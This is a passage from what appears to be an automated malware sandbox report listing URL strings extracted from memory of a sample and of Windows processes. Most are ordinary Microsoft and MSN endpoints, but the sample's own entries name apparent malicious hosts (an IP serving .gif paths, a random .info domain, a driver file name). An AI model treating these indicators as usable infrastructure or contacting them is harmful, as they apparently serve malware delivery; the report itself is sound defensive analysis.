        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gifhttp://46.105.103.219/sobakavolos.gifK
        Source: RHxJqGoGFB.exe, RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
        Source: svchost.exe, 00000009.00000000.1856834197.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
        Source: svchost.exe, 00000009.00000000.1856834197.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3110275935.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comt
        Source: SearchApp.exe, 00000013.00000000.1991249729.0000024B440E7000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1955687882.0000024339C6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
        Source: SearchApp.exe, 00000013.00000000.1991249729.0000024B440E7000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1955687882.0000024339C6C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1982087005.0000024B422E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
        Source: SearchApp.exe, 00000013.00000000.1974545308.0000024B41F56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
        Source: SearchApp.exe, 00000013.00000000.2007962329.0000024B447AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/fixsearch
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 0000000D.00000000.1885971448.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: SearchApp.exe, 00000013.00000000.1961146784.0000024340CDC000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2056369777.0000024B55A15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5
        Source: explorer.exe, 0000000D.00000000.1885971448.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
        Source: explorer.exe, 0000000D.00000002.4185243812.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.4303202418.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1881934749.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1880009773.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 0000000D.00000000.1885971448.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: SearchApp.exe, 00000013.00000000.1955650255.0000024339C3F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comC
        Source: explorer.exe, 0000000D.00000000.1885971448.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1857045452.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
        Source: svchost.exe, 00000009.00000000.1857045452.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comer
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.coms
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: StartMenuExperienceHost.exe, 00000011.00000000.1920243025.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comcp
        Source: SearchApp.exe, 00000013.00000000.2025144010.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
        Source: SearchApp.exe, 00000013.00000000.2011488660.0000024B44916000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfillsThis
        Source: SearchApp.exe, 00000013.00000000.1978747312.0000024B42180000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcc.loki.delve.office.com/api
        Source: SearchApp.exe, 00000013.00000000.1978747312.0000024B42180000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/api/
        Source: SearchApp.exe, 00000013.00000000.2009862095.0000024B44895000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/api/v1/configuration/cortana
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
        Source: SearchApp.exe, 00000013.00000000.2008268339.0000024B447D3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2039358482.0000024B55252000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/
        Source: SearchApp.exe, 00000013.00000000.2039358482.0000024B55252000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/parseSharePointUrlResponse
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2062104183.0000024B55CEE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: svchost.exe, 00000009.00000000.1857045452.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
        Source: svchost.exe, 00000009.00000000.1857045452.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983552911.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
        Source: SearchApp.exe, 00000013.00000000.1979246867.0000024B4218C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1963261928.0000024341183000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2002312401.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api
        Source: SearchApp.exe, 00000013.00000000.2009862095.0000024B44895000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/cortana
        Source: SearchApp.exe, 00000013.00000000.1979246867.0000024B4218C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://msit.loki.delve.office.com/apiQ
        Source: SearchApp.exe, 00000013.00000000.1981999938.0000024B422C3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983214754.0000024B42434000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2090383153.0000024B5843A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mths.be/fromcodepoint
        Source: SearchApp.exe, 00000013.00000000.2154000776.0000024B5BE70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/web-widget?form=M
        Source: StartMenuExperienceHost.exe, 00000011.00000000.1920598459.000001B9814D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
        Source: SearchApp.exe, 00000013.00000000.1977010111.0000024B420F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/owa
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://outlook.office.com/
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2008231258.0000024B447CF000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
        Source: SearchApp.exe, 00000013.00000000.2120942130.0000024B59FBC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.AccessZ
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWrite
        Source: SearchApp.exe, 00000013.00000000.1968354568.0000024B41B40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWriteK
        Source: SearchApp.exe, 00000013.00000000.2145703582.0000024B5AC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/Z
        Source: SearchApp.exe, 00000013.00000000.2007962329.0000024B447AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/menuItemWithButton
        Source: SearchApp.exe, 00000013.00000000.2047714697.0000024B5549B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/owa
        Source: SearchApp.exe, 00000013.00000000.2026092369.0000024B54E44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
        Source: SearchApp.exe, 00000013.00000000.2081086933.0000024B56C20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/mail/
        Source: SearchApp.exe, 00000013.00000000.2039358482.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/mail/deeplink/attachment/
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
        Source: StartMenuExperienceHost.exe, 00000011.00000000.1920243025.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comxee
        Source: SearchApp.exe, 00000013.00000000.2001152845.0000024B4434A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rafd.https://r.a
        Source: SearchApp.exe, 00000013.00000000.2001152845.0000024B4434A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://raka.rms_noco-VK
        Source: SearchApp.exe, 00000013.00000000.2025144010.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
        Source: SearchApp.exe, 00000013.00000000.1973204651.0000024B41E30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://searchapp.bundleassets.example/desktop/2.html
        Source: SearchApp.exe, 00000013.00000000.2163698935.0000024B5C7E8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://searchapp.bundleassets.example/desktop/2.htmlms-appx-web:///Cortana.UI/cache/svlocal/desktop
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
        Source: SearchApp.exe, 00000013.00000000.2150387382.0000024B5B7D0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2135083120.0000024B5A6C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/
        Source: SearchApp.exe, 00000013.00000000.2007962329.0000024B447AD000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2047873548.0000024B554A2000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2008268339.0000024B447D3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2136586195.0000024B5A784000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2076053917.0000024B56420000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office.com
        Source: SearchApp.exe, 00000013.00000000.1968354568.0000024B41B40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Access
        Source: SearchApp.exe, 00000013.00000000.2046239293.0000024B55425000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.AccessBUK
        Source: SearchApp.exe, 00000013.00000000.2047088178.0000024B5546F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWrite
        Source: SearchApp.exe, 00000013.00000000.2039358482.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office.com/api/v2.0/Users(
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/users/
        Source: SearchApp.exe, 00000013.00000000.2121312411.0000024B59FD3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/users/https://substrate.office365.us/imageB2/v1.0/users/u.
        Source: SearchApp.exe, 00000013.00000000.2002312401.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api
        Source: SearchApp.exe, 00000013.00000000.2039358482.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/events?scenario=
        Source: SearchApp.exe, 00000013.00000000.2042423325.0000024B5530E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/queryetItemChttps://substrate.office365.us/search/api/v2/
        Source: SearchApp.exe, 00000013.00000000.2046239293.0000024B55425000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/api/v2.0/Users(
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/imageB2/v1.0/users/
        Source: SearchApp.exe, 00000013.00000000.1955545432.0000024339C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
        Source: SearchApp.exe, 00000013.00000000.1955545432.0000024339C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000011.00000000.1920243025.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: SearchApp.exe, 00000013.00000000.1983410823.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
        Source: SearchApp.exe, 00000013.00000000.2155834634.0000024B5BF90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/4-pics-1-word/cg-9nrv2p37thp1https://www.msn.com/de-ch/play/gam
        Source: SearchApp.exe, 00000013.00000000.2149734955.0000024B5B640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/basketball-serial-shooter/cg-9nzb8b5rrfdbhttps://www.msn.com/de
        Source: SearchApp.exe, 00000013.00000000.2149680886.0000024B5B620000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bricks-breaker-deluxe-crusher/cg-9nnjfbfrzq3j
        Source: SearchApp.exe, 00000013.00000000.2155834634.0000024B5BF90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/fish-merge-frvr/cg-9mxwbd9sw3prhttps://www.msn.com/de-ch/play/g
        Source: SearchApp.exe, 00000013.00000000.2155834634.0000024B5BF90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/garden-tales-3/cg-9mx8n3gh3k6q
        Source: SearchApp.exe, 00000013.00000000.2149734955.0000024B5B640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play?ocid=winpsearchboxexpcta2&cgfrom=cg_dsb_seeMorehttps://www.msn.com/de
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
        Source: SearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2039358482.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2098176257.0000024B58760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
        Source: SearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2098176257.0000024B58760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
        Source: SearchApp.exe, 00000013.00000000.2039358482.0000024B55240000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbm
        Source: SearchApp.exe, 00000013.00000000.1960756878.0000024340BDE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/dhp_l
        Source: SearchApp.exe, 00000013.00000000.1960756878.0000024340BDE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/mmx0
        Source: SearchApp.exe, 00000013.00000000.1960756878.0000024340BDE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ntphttps://www.msn.com/spartan/ntpX
        Source: SearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2098176257.0000024B58760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
